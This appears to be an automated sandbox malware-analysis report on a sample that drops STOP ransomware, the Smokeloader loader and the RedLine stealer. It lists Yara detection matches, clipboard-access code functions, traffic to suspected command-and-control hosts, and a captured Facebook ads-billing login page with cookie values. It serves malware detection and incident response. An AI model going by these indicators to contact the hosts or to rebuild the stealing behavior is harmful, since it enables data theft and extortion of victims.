          Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"status":3,"accounts":"0"}JaU9pSlNSVWszYlhjaWZleUp6YVdRaU9qSTRPREF4T1N3aWRHbHRaU0k2TVRZM05UUT09ctingClientSingleton:{r:["Jg4hod5","3zhsDmU","Yv2Rq7N"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["c6kpRKc","9Zir1u8","sqCOqNp","HN4gUih","foz7nw7","msMcd10","TjYa5zM","5p9Jgd9","Ajrp3n3","CUpDMe1"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Jg4hod5"],be:1}}}},allResources:["c6kpRKc","sqCOqNp","GpQFBwL","TjYa5zM","foz7nw7","CUpDMe1","msMcd10","BnbajS7","HN4gUih","Da6rL6k"]});}));</script></body></html>ActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487281236720703"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","jJziY-D4SfNE_AIOga4wSI2k",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","jJziY-AS0VgVTvocQFmmqm_m",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{PPTP){3DFD28C0-5D9B-43CA-809F-C01D8A78D17E}}Ada11 equals www.facebook.com (Facebook)
          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmxjpgcre.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org
          Source: unknownHTTPS traffic detected: 158.69.96.67:443 -> 192.168.2.3:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 157.240.253.35:443 -> 192.168.2.3:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49721 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: Yara matchFile source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,11_2_00402830
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,11_2_00402830
          Source: file.exe, 00000000.00000002.313412011.0000000000918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Source: Yara matchFile source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTR

          System Summary

          barindex
          Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 14.0.A33B.exe.7b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
          Source: 00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000D.00000002.396738460.000000000222E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000021.00000002.516055302.00000000022BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000002A.00000002.518333813.0000000002290000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000012.00000002.483535048.0000000000726000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.313241208.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 0000000B.00000002.604551133.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000012.00000002.483475283.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 0000000B.00000002.605642320.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000027.00000002.517661661.00000000022E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: C:\Users\user\AppData\Local\Temp\A33B.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
          Source: llpb1133.exe.14.drStatic PE information: .vmp0 and .vmp1 section names
          Source: C:\Users\user\AppData\Local\Temp\ECFB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004154580_2_00415458
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041545C0_2_0041545C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B4030_2_0040B403
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411D500_2_00411D50
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413E210_2_00413E21
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004122940_2_00412294
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004127D80_2_004127D8
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004010E011_2_004010E0
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0040615011_2_00406150
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004041D011_2_004041D0
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004021D011_2_004021D0
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0042429D11_2_0042429D
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0041147011_2_00411470
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0042C5FE11_2_0042C5FE
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004266B911_2_004266B9
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0040283011_2_00402830
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0040C9A011_2_0040C9A0
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00419A6E11_2_00419A6E
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0041CAF011_2_0041CAF0
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00409B1011_2_00409B10
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0042AB9A11_2_0042AB9A
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0040CC4011_2_0040CC40
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00401D9011_2_00401D90
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0040CE9011_2_0040CE90
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00421F4811_2_00421F48
          Source: sqlite3.dll.19.drStatic PE information: Number of sections : 18 > 10
          Source: XandETC.exe.14.drStatic PE information: Number of sections : 11 > 10
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 14.0.A33B.exe.7b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
          Source: 00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
